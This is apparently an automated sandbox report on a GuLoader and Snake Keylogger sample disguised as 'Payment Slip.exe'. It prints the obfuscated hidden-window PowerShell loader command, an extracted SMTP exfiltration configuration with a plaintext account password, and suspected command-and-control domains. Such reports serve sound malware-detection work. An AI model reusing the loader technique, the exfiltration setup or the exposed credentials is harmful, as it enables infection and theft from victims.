Edit tour

Windows Analysis Report
Payment Slip.exe

Overview

General Information

Sample name:	Payment Slip.exe
Analysis ID:	1481491
MD5:	db9b31da65d0ef913176d54ceb4cf5f4
SHA1:	5878f8c4e6b82ef6c9d32c020bb9d5898e973e96
SHA256:	893b893178434a4273089c619b1acaefab661c6d647d832a6375fb53e2753669
Tags:	exe
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Powershell drops PE file

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Payment Slip.exe (PID: 6048 cmdline: "C:\Users\user\Desktop\Payment Slip.exe" MD5: DB9B31DA65D0EF913176D54CEB4CF5F4)

powershell.exe (PID: 3372 cmdline: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Masculinity.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Temp\Masculinity.exe" MD5: DB9B31DA65D0EF913176D54CEB4CF5F4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "amir.brizman@raicoi.com", "Password": "9Lhb3)$OQ.km", "Host": "smtp.privateemail.com", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.2679871550.00000000095F2000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Masculinity.exe PID: 528	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Masculinity.exe PID: 528	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", CommandLine: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Slip.exe", ParentImage: C:\Users\user\Desktop\Payment Slip.exe, ParentProcessId: 6048, ParentProcessName: Payment Slip.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", ProcessId: 3372, ProcessName: powershell.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 66.29.159.53, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Masculinity.exe, Initiated: true, ProcessId: 528, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49734

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", CommandLine: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Slip.exe", ParentImage: C:\Users\user\Desktop\Payment Slip.exe, ParentProcessId: 6048, ParentProcessName: Payment Slip.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", ProcessId: 3372, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 193.122.6.168

Timestamp:	2024-07-25T10:05:32.773119+0200
SID:	2803274
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.5

Timestamp:	2024-07-25T10:04:28.575054+0200
SID:	2022930
Source Port:	443
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.5

Timestamp:	2024-07-25T10:05:06.827230+0200
SID:	2022930
Source Port:	443
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 193.122.6.168

Timestamp:	2024-07-25T10:05:23.882523+0200
SID:	2803274
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-07-25T10:05:24.468328+0200
SID:	2803305
Source Port:	49718
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 193.122.6.168

Timestamp:	2024-07-25T10:05:21.569955+0200
SID:	2803274
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.5 - Destination IP: 108.167.181.251

Timestamp:	2024-07-25T10:05:10.710092+0200
SID:	2803270
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-07-25T10:06:02.130852+0200
SID:	2803305
Source Port:	49732
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://smtp.privateemail.com	Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: malware
Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "amir.brizman@raicoi.com", "Password": "9Lhb3)$OQ.km", "Host": "smtp.privateemail.com", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: Payment Slip.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A986DC CryptUnprotectData,		7_2_04A986DC
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A98EF1 CryptUnprotectData,		7_2_04A98EF1

Source: Payment Slip.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2

Source:	Binary string: ation.pdb source: powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2678804410.00000000080E2000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0040276E FindFirstFileW,	7_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_00405770
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0040622B FindFirstFileW,FindClose,	7_2_0040622B

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 0015F2EDh	7_2_0015F150
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 0015F2EDh	7_2_0015F33C
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 0015FAA9h	7_2_0015F804
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A631E8h	7_2_04A62DD0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A62C21h	7_2_04A62970
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6FD21h	7_2_04A6FA78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A60D0Dh	7_2_04A60B30
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A61697h	7_2_04A60B30
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6D1B1h	7_2_04A6CF08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6E769h	7_2_04A6E4C0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6DEB9h	7_2_04A6DC10
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6E311h	7_2_04A6E068
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_04A60040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A631E8h	7_2_04A62DCB
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6F471h	7_2_04A6F1C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A631E8h	7_2_04A63116
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6EBC1h	7_2_04A6E918
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6F019h	7_2_04A6ED70
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6F8C9h	7_2_04A6F620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6DA61h	7_2_04A6D7B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6D609h	7_2_04A6D360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A99280h	7_2_04A98FB0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A97EB5h	7_2_04A97B78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A92151h	7_2_04A91EA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9DF86h	7_2_04A9DCB8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A96733h	7_2_04A96488
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then mov esp, ebp	7_2_04A9AC81
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A90741h	7_2_04A90498
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9F1C6h	7_2_04A9EEF8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A90B99h	7_2_04A908F0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A97571h	7_2_04A972C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9BF96h	7_2_04A9BCC8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A95179h	7_2_04A94ED0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9DAF6h	7_2_04A9D828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A948C9h	7_2_04A94620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9BB06h	7_2_04A9B838
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A962D9h	7_2_04A96030
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A932B1h	7_2_04A93008
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9FAE6h	7_2_04A9F818
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A96CC1h	7_2_04A96A18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9ED36h	7_2_04A9EA68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A93709h	7_2_04A93460
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A94D21h	7_2_04A94A78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9CD46h	7_2_04A9CA78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A97119h	7_2_04A96E70
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A902E9h	7_2_04A90040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A91CF9h	7_2_04A91A50
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9B676h	7_2_04A9B3A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A91449h	7_2_04A911A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A92E59h	7_2_04A92BB0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9F656h	7_2_04A9F388
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A95A29h	7_2_04A95780
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9D666h	7_2_04A9D398
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9C8B6h	7_2_04A9C5E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A918A1h	7_2_04A915F8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A95E81h	7_2_04A95BD8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9E8A6h	7_2_04A9E5D8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A955D1h	7_2_04A95328
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A979C9h	7_2_04A97720
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9D1D6h	7_2_04A9CF08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A925A9h	7_2_04A92300
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9B1E6h	7_2_04A9AF18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9E416h	7_2_04A9E148
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A90FF1h	7_2_04A90D48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A92A01h	7_2_04A92758
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9C426h	7_2_04A9C158
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB64E0h	7_2_04AB61E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB5EB7h	7_2_04AB5B48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB3076h	7_2_04AB2DA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABD7A0h	7_2_04ABD4A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABAC98h	7_2_04ABA9A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB5986h	7_2_04AB56B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB94B0h	7_2_04AB91B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB69A8h	7_2_04AB66B0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB2756h	7_2_04AB2488
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABC480h	7_2_04ABC188
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB154Eh	7_2_04AB1280
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB9978h	7_2_04AB9680
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB5066h	7_2_04AB4D98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB8190h	7_2_04AB7E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABEF88h	7_2_04ABEC90
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB42B6h	7_2_04AB3FE8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABFDE0h	7_2_04ABFAE8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABD2D8h	7_2_04ABCFE0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB22C6h	7_2_04AB1FF8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABBAF0h	7_2_04ABB7F8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB10BEh	7_2_04AB0DF0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB8FE8h	7_2_04AB8CF0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB3996h	7_2_04AB36C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABEAC0h	7_2_04ABE7C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABBFB8h	7_2_04ABBCC0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABA7D0h	7_2_04ABA4D8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB079Eh	7_2_04AB04D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB7CC8h	7_2_04AB79D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB54F6h	7_2_04AB5228
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB8B20h	7_2_04AB8828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABF918h	7_2_04ABF620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB3506h	7_2_04AB3238
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABE130h	7_2_04ABDE38
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABB628h	7_2_04ABB330
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB4BD6h	7_2_04AB4908
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB7800h	7_2_04AB7508
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABE5F8h	7_2_04ABE300
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB2BE6h	7_2_04AB2918
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABCE10h	7_2_04ABCB18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB19B7h	7_2_04AB1710
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABA308h	7_2_04ABA010
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB1E36h	7_2_04AB1B68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABB160h	7_2_04ABAE68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB0C2Eh	7_2_04AB0960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB8658h	7_2_04AB8360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB4747h	7_2_04AB4478
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB6E70h	7_2_04AB6B78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABDC68h	7_2_04ABD970
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB9E40h	7_2_04AB9B48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB030Eh	7_2_04AB0040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB7338h	7_2_04AB7040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB3E26h	7_2_04AB3B58
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABF450h	7_2_04ABF158
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABC948h	7_2_04ABC650
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E01B20h	7_2_04E01828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E01190h	7_2_04E00E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E00339h	7_2_04E00040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E00CC8h	7_2_04E009D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E01658h	7_2_04E01360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E00800h	7_2_04E00508
